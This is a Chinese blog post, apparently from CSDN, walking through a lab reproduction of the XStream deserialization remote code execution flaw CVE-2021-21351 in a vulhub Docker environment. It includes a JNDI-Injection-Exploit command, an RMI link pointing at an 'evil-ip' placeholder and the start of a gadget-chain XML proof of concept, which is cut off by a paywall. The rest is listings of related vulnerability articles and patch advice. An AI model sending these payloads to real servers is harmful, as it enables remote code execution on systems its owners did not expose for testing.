CVE-2021-21351 XStream反序列化远程代码执行漏洞

最新推荐文章于 2024-05-04 18:17:47 发布
最新推荐文章于 2024-05-04 18:17:47 发布
阅读量2.4k 收藏 6
点赞数
分类专栏: 黑客 网络安全 漏洞复现 文章标签: 安全漏洞 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56642842/article/details/119679743
版权

0x00 简介

XStream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。

0x01 漏洞概述

在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解组时处理的流包含类型信息以重新创建以前编写的对象,XStream 因此基于这些类型信息创建新实例,攻击者可以操纵处理过的输入流并替换或注入对象,从而执行从远程服务器加载的任意代码。没有用户受到影响,他们遵循建议设置 XStream 的安全框架,并将白名单限制为所需的最少类型。如果您依赖 XStream 的默认安全框架黑名单,则必须至少使用 1.4.16 版本。

0x02 影响范围

Xstream<=1.4.15

0x03 环境搭建

1.使用docker进行验证

https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351

2.启动及运行该环境

docker-compose up -d

image-20210809131729953

2.查看环境启动情况

image-20210809131753838

启动成功后访问

http://192.168.141.131:8080

image-20210809131814979

3.Bp抓包,测试服务器是否启动

image-20210809131834892

把GET请求改为POST,并添加如下命令

<?xml version="1.0" encoding="UTF-8" ?>

<user>

  <name>MAX</name>

  <age>99</age>

</user>

image-20210809131901607

如上,服务器正常

0x04 漏洞复现

该漏洞需org.apache.naming.factory.BeanFactory`借助EL表达式注入来执行任意命令,使用JNDI-Injection-Exploit工具可以启动JNDI服务器以获得 JNDI 链接,可以将这些链接插入到你的POC中来测试漏洞

工具链接

https://github.com/welk1n/JNDI-Injection-Exploit/

1.下载该工具jar文件

https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

2.使用如下命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/success" -A 192.168.141.131

image-20210809131918568

3.使用箭头所指的基于SpringBoot漏洞利用工具的RMI地址

rmi://192.168.141.131:1099/7kqx32

作为POC中的

<dataSource>rmi://evil-ip:1099/example</dataSource>

POC如下

<sorted-set>

 <javax.naming.ldap.Rdn_-RdnEntry>

  <type>ysomap</type>

  <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>

   <m__DTMXRTreeFrag>

     <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>

      <m__size>-10086</m__size>

      <m__mgrDefault>

       <__overrideDefaultParser>false</__overrideDefaultParser>

       <m__incremental>false</m__incremental>

       <m__source__location>false</m__source__location>

       <m__dtms>

        <null/>

       </m__dtms>

       <m__defaultHandler/>

      </m__mgrDefault>
最低0.47元/天 解锁文章
m0_56642842
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XStream 反序列化远程命令执行漏洞复现(CVE-2021-21351)
weixin_43223153的博客
03-30 5644
XStream 反序列化远程命令执行漏洞复现 1. 漏洞影响版本 XStream <= 1.4.15 2. 环境搭建 安装漏洞靶场vulhub git clone git://github.com/vulhub/vulhub.git 3. 漏洞复现 1 进入到漏洞环境文件夹,启动漏洞环境。 cd /vulhub/xstream/CVE-2021-21351 docker-compose up -d 2 启动好之后,访问靶机的ip加8080端口 3 下载JNDI注入利用工具: 下载地址:https
腾讯蓝军安全通告|XStream远程代码执行漏洞(CVE-2021-29505)
Tencent_SRC的博客
05-17 5649
前言上周五XStream官方发布安全更新,由于官方把需要公告的CVE-2021-29505(任意代码执行漏洞)链接贴错成了CVE-2020-26258(SSRF漏洞)链接,导致很多人没有重...
开源组件XStream 修复11个漏洞并公开 PoC
smellycat000的专栏
03-16 858
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队XStream 发布新版本 1.4.16,修复了11个漏洞CVE-2021-21341、CVE-2021-21342、CVE...
XStream 组件漏洞修复
悟●禅●酒的专栏
04-06 2203
风险描述 XStream 是Java 类库中的常用组件,可将Java 对象序列化为XML,反之可将Java 对象和XML 文档相互转换。 XStream 官方发布安全公告,披露多个反序列化漏洞,包括: 1、拒绝服务漏洞CVE-2021-21341/21348)攻击者可利用该漏洞操纵已处理的输入流并替换或注入对象,执行恶意正则表达式的计算,从而造成拒绝服务攻击。 2、服务端请求伪造漏洞CVE-2021-21342/21349)攻击者可利用该漏洞操纵已处理的输入流并替换或注入对象,从而伪造服务端请求。
网络安全最新【漏洞复现】2(1)
最新发布
2401_84302796的博客
05-04 941
替换工具生成的payload:rmi://192.168.71.128:1099/mrflzc 到Burpsuite,其中生成的链接后面的codebaseClass是6位随机的,因为不希望工具生成的链接本身成为一种特征呗监控或拦截。服务器地址实际上就是codebase地址,相比于marshalsec中的JNDI server来说,这个工具把JNDI server和HTTP server绑定到一起,并自动启动HTTPserver返回相应class,更自动化了。开启新的窗口监听4444端口。
XStream 反序列化命令执行漏洞CVE-2021-21351
EC_Carrot的博客
08-21 1079
漏洞简介 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。 漏洞复现 由于目标环境Java版本高于8u191,所以我们需要使用org.apache.naming.
XStream 高危漏洞合集,XStream 组件反序列化漏洞
weixin_45314962的博客
11-27 1779
CVE-2021-29505反序列化代码执行漏洞
XStream远程代码执行漏洞
m0_57768075的博客
06-18 1384
受影响系统: XStream XStream < 1.4.16 描述: -------------------------------------------------------------------------------CVE(CAN) ID: CVE-2021-21345 XStreamXStreamXstream)团队的一个轻量级的、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 1.4.16之前版本存在远程代码执行漏洞远程
CVE-2020-26217: XStream 远程代码执行漏洞通告
爱国小白帽
11-16 5910
原创360CERT[三六零CERT](javascript:void(0)???? 2020-11-16 12:09:18 报告编号:B6-2020-111601 报告来源:360CERT 报告作者:360CERT 更新日期:2020-11-16 0x01 漏洞简述 2020年11月16日,360CERT监测发现 XStream 发布了 XStream 安全更新 的风险通告,该漏洞编号为 CVE-2020-26217 ,漏洞等级:严重 ,漏洞评分:9.8 。 XStream 发布安全更新修复了一处反
xstream-cve_2021_21351反序列化漏洞复现
whj_study的博客
01-19 2948
# 漏洞名称: xstream-cve_2021_21351 ## 漏洞简介 * Stream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解
XStream 反序列化命令执行漏洞复现(CVE-2021-21351
Vitaminapple的博客
04-19 477
XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息 这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的服务参数...仅允许使用字符串,拒绝任何数组。字符串清理如预期般运作。” 因为没有很好地解释漏洞(我认为),所以我决定根据系统信息的漏洞版本编写小型应用程序。 PoC包含: 使用明确的易受攻击的系统信息测试Node.js中制作的应用 简单测试有效负载即可在受影响的计算机上创建.txt文件 重现步骤: 在Linux服务器环境上运行应用程序 向site.com/api/getServices?name=nginx发出GET请求(nginx只是示例) 现在尝试发送这样的请求:yoursite.co
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
xstream 远程代码执行CVE-2021-29505)
YouthBelief的博客
11-14 1327
这里写目录标题0x01 漏洞描述0x02 影响范围0x03 漏洞复现环境搭建0x04 漏洞修复 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 环境搭建 0x04 漏洞修复
XStream漏洞编号是 CVE-2021-21351的应对措施
06-11
XStream漏洞编号 CVE-2021-21351 是由于 XStream 序列化时对恶意 XML 转换导致的安全漏洞。以下是一些应对措施: 1. 尽可能升级 XStream 的版本到 1.4.16 或更高版本,因为这些版本已经修复了该漏洞。 2. 如果无法升级到最新版本,可以通过在 XStream 实例中禁用 DTD 解析来缓解此漏洞。可以通过以下代码实现: ``` XStream xstream = new XStream(); xstream.ignoreUnknownElements(); ``` 3. 可以通过限制可反序列化的类或使用安全的转换器来减少攻击面。 4. 将 XStream 序列化作为一个不可信的输入,始终对其进行适当的验证和过滤。 5. 使用其他序列化库,例如 Jackson 或 Gson,来代替 XStream。 以上是一些常见的应对措施,但实际上解决此漏洞的最好方法是升级 XStream 到最新版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值